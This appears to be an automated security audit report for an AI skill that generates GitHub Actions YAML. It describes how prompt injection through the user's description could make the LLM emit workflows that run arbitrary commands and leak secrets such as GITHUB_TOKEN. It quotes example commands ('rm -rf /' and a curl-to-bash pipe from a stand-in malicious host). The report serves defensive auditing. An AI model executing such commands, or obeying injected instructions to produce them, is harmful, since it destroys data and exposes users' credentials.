Trust Assessment
github-action-gen received a trust score of 58/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 4 findings: 2 critical, 0 high, 1 medium, and 0 low severity. Key findings include Unpinned npm dependency version, Direct User Input in LLM Prompt, Arbitrary Command Execution and Data Exfiltration via Maliciously Generated GitHub Actions YAML.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 40/100, indicating areas for improvement.
Last analyzed on February 12, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (4)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | **Direct User Input in LLM Prompt.** The user-provided `description` argument is directly concatenated into the `user` message sent to the OpenAI API without any sanitization or validation. This allows an attacker to inject arbitrary instructions into the LLM's prompt, potentially overriding system instructions, extracting sensitive information from the LLM's context, or influencing the generated output in unintended ways. This is the root cause of the subsequent command injection and data exfiltration risks. Recommendation: implement robust input validation and sanitization for user-provided descriptions. Consider using prompt templating engines that strictly separate user input from system instructions, or employ techniques like input filtering, escaping, or a separate LLM call for input classification/refinement before generating the final prompt. | LLM | src/index.ts:13 |
| CRITICAL | **Arbitrary Command Execution and Data Exfiltration via Maliciously Generated GitHub Actions YAML.** The skill generates GitHub Actions YAML based on user input, which is then written to a file (either `.github/workflows/ai-generated.yml` or a user-specified path via `-o`) and intended for execution by GitHub Actions. Due to the prompt injection vulnerability (SS-LLM-001), a malicious user can craft a `description` that instructs the LLM to generate YAML containing arbitrary shell commands. When this YAML is executed in a GitHub Actions runner, it can lead to (1) **Command Injection:** execution of arbitrary commands on the runner (e.g., `rm -rf /`, `curl malicious.com/payload \| bash`); and (2) **Data Exfiltration:** leakage of sensitive data from the runner environment, including environment variables (like `GITHUB_TOKEN`), repository files, or other secrets accessible to the runner. Recommendation: (1) **Mitigate Prompt Injection:** address the SS-LLM-001 finding to prevent the LLM from generating malicious YAML. (2) **Output Validation:** implement strict validation or an allow-list for the generated YAML content to ensure it only contains safe and expected GitHub Actions constructs; this could involve parsing the YAML and checking for dangerous keywords, commands, or patterns. (3) **Least Privilege:** advise users to run generated workflows with the minimum necessary permissions. (4) **User Confirmation:** for critical actions, require explicit user confirmation before writing or applying the generated workflow. | LLM | src/cli.ts:23 |
| MEDIUM | **Unpinned npm dependency version.** Dependency `commander` is not pinned to an exact version (`^12.1.0`). Recommendation: pin dependencies to exact versions to reduce drift and supply-chain risk. | Dependencies | skills/lxgicstudios/github-action-gen/package.json |
| INFO | **Dependencies Pinned to Caret Ranges.** The `package.json` file specifies dependencies using caret (`^`) ranges (e.g., `^12.1.0`). While `package-lock.json` provides exact versions, relying solely on caret ranges in `package.json` can lead to unexpected dependency updates during installation, potentially introducing vulnerabilities or breaking changes if a new minor or patch version of a dependency contains malicious code or a bug. This is a minor supply chain risk. Recommendation: consider pinning dependencies to exact versions (e.g., `12.1.0` instead of `^12.1.0`) in `package.json` to ensure deterministic builds and prevent unintended updates. Regularly audit and update dependencies. | LLM | package.json:9 |